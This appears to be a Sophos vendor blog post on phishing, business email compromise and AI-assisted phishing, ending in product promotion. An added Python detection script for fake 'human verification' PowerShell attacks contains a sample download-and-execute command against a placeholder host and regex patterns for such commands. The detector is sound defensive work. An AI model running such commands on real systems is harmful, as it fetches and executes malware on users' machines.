When people think of cyber threats today, ransomware tends to dominate the conversation. It’s flashy, destructive, and grabs headlines. But ransomware rarely arrives on its own. More often than not, it’s delivered through something deceptively simple: an email.
Spam may seem like an outdated nuisance, but attackers are evolving it into something much more dangerous. Today, spam is just the starting point. The real threats are phishing and business email compromise (BEC), which exploit trust, steal credentials, and cost organizations billions.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) reports that 90% of successful cyberattacks start with phishing. And Sophos’ 2025 State of Ransomware report reinforces that email remains a major vector of attack, with 19% of ransomware victims reporting malicious email as the root cause and a further 18% citing phishing, a notable jump from last year’s 11%.
Email-based attacks aren’t relics of the past. They’re active, sophisticated, and increasingly lucrative for attackers.
Spam isn’t dead; it’s evolving
While many assume spam is outdated, today’s attackers are turning it into a precision tool, one that’s harder to detect and easier to scale.
Spam has been around as long as email itself, dating back to the 1990s when some of the first phishing emails were sent to AOL users. But attackers are still constantly refining their tactics.
Sophos X-Ops researchers have observed a surge in business email compromise (BEC) schemes, in which threat actors manipulate employees into transferring funds or revealing sensitive information. In fact, domestic and international dollar losses from BEC scams now exceed $3 billion a year globally.
The Sophos X-Ops Counter Threat Unit observed that phishing was the initial access vector in 43% of emergency incident response engagements last year. Within X-Ops’ managed detection and response (MDR) investigations, where analysts proactively dig into suspicious activity before it becomes a full-blown crisis, phishing played a role in 65% of cases.
The takeaway is clear: Whether it’s an active breach or early warning, email-based threats remain one of the most common ways attackers gain a foothold. Ignoring them puts organizations at serious risk.
The rise of AI-enhanced phishing
Attackers are leveraging generative AI tools to craft more convincing phishing emails and spam messages. While threat actors haven’t fully mastered AI yet, they’re increasingly experimenting with GPTs and large language models (LLMs) to scale up their phishing campaigns.
Some threat actors are creating their own GPTs to generate phishing emails and malware. As X-Ops reported earlier this year, “Some threat actors…seem increasingly interested in using generative AI for spamming and scamming. We observed a few examples of cybercriminals providing tips and asking for advice on this topic, including using GPTs for creating phishing emails and spam SMS messages.”
The Sophos 2025 Annual Threat Report also highlighted the emergent use of generative AI in phishing emails. These AI-generated attacks are reshaping the threat landscape and putting every inbox at risk.
LLMs can be used to create grammatically correct content in a format that varies from target to target, effectively defeating content filters that rely on signatures to identify spam and phishing emails. This means traditional filters alone aren’t enough; organizations need adaptive protection that evolves as fast as the threats do.
In October 2024, Sophos AI demonstrated that an entire campaign of targeted emails could be created using AI-orchestrated processes that leveraged existing tools and information gathered from targeted individuals’ social media profiles. This demonstration highlights the growing sophistication of phishing attacks and underscores the need for advanced security measures to protect against such threats.
Another popular tactic is QR code phishing (also known as “quishing”), which embeds malicious QR codes in emails to redirect users to phishing sites. Quishing attacks are evolving fast, with polished designs that slip past traditional filters and lure users into opening malicious files or web pages.
Social engineering: The human factor
Spam and phishing don’t rely on technical flaws — they target people. And in fast-paced environments, even the most vigilant employees can be tricked. Awareness and layered protection are critical.
The Sophos X-Ops Counter Threat Unit observed a surge in innovative social engineering attacks throughout 2024, with threat actors increasingly targeting help desk staff and exploiting human trust rather than technical vulnerabilities.
For example, the GOLD HARVEST threat group has used fake human verification prompts targeting employees who searched for streaming content on corporate devices. Victims were asked to complete keyboard sequences to “prove” they were human, but these actions silently triggered malicious PowerShell code to install infostealer malware.
This tactic is a bold example of how attackers exploit curiosity and convenience, bypassing traditional phishing methods and leveraging behavioral manipulation.
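As an added illustration (not code from the article or from Sophos), here is a small defender-side check for the pattern just described: a script host launched from the desktop shell with download-and-execute style arguments. The events are constructed Sysmon-style process-creation records, the domain is a placeholder, and the assumption that a pasted Run-dialog command appears with explorer.exe as its parent is mine.

```python
import re

# Constructed sample events (Sysmon Event ID 1 style fields), not real telemetry.
# Event 0 mimics the fake "verification" flow; 1 is a benign scheduled script;
# 2 is the same flow via mshta with fewer indicators.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://placeholder.invalid/x | iex"',
     "User": "CORP\\alice"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\Agent\agent.exe",
     "CommandLine": "powershell -File C:\\Scripts\\inventory.ps1",
     "User": "NT AUTHORITY\\SYSTEM"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta http://placeholder.invalid/verify",
     "User": "CORP\\bob"},
]

# Assumption: commands pasted into the Win+R Run dialog are spawned by explorer.exe.
INTERACTIVE_PARENTS = ("explorer.exe",)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")
SUSPICIOUS_ARGS = [
    (re.compile(r"-(w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.I), "web download"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "in-memory execution"),
    (re.compile(r"\bhttps?://", re.I), "URL in command line"),
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (score, reasons): one point per matched indicator for a single event."""
    reasons = []
    if basename(ev["ParentImage"]) in INTERACTIVE_PARENTS and basename(ev["Image"]) in SCRIPT_HOSTS:
        reasons.append("script host launched from the desktop shell")
    reasons += [label for rx, label in SUSPICIOUS_ARGS if rx.search(ev["CommandLine"])]
    return len(reasons), reasons

def flag_events(events, threshold=2):
    """Return (user, score, reasons) for events at or above the alert threshold."""
    scored = [(ev["User"], *score_event(ev)) for ev in events]
    return [row for row in scored if row[1] >= threshold]

if __name__ == "__main__":
    for user, score, reasons in flag_events(SAMPLE_EVENTS):
        print(f"ALERT user={user} score={score} reasons={reasons}")
```

The threshold keeps a lone URL or a single hidden-window flag from paging anyone; in practice you would tune it against your own baseline of legitimate PowerShell use.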
Even cybersecurity companies aren’t immune. Sophos itself was recently targeted in a phishing attack, underscoring how pervasive and effective these threats can be. In this case, a senior Sophos employee fell victim to a phishing email and entered their credentials into a fake login page, leading to a multi-factor authentication (MFA) bypass and a threat actor attempting to access our network. Multiple Sophos teams worked together to eliminate this threat and have started new initiatives to improve intelligence gathering and tighten feedback loops.
How Sophos Email protects against phishing, spam, and BEC
Sophos Email doesn’t just keep up with evolving threats — it anticipates them. With AI-powered analytics and seamless integration, it’s built to stop phishing, spam, and BEC before they reach your inbox.
Sophos Email offers:
- Flexible deployment options.
- Intuitive policy controls.
- Advanced threat analytics powered by over 20 AI and ML models.
- Seamless integration with Sophos Central, Microsoft 365, and Google Workspace.
The Sophos platform scans messages for malicious URLs and QR codes, protecting users from phishing, malware, ransomware, and unsafe websites. It’s a robust solution designed to safeguard organizations from the growing threat of BEC and phishing.
Additionally, Sophos now offers the Email Monitoring System (EMS) — a new enhancement for customers who use Microsoft M365 Defender, Google Workspace Security, or any third-party email security services. EMS gives security teams the clarity and control they need, with deep visibility, actionable reporting, and fast, simplified remediation. You can get started with a free trial of Sophos Email today.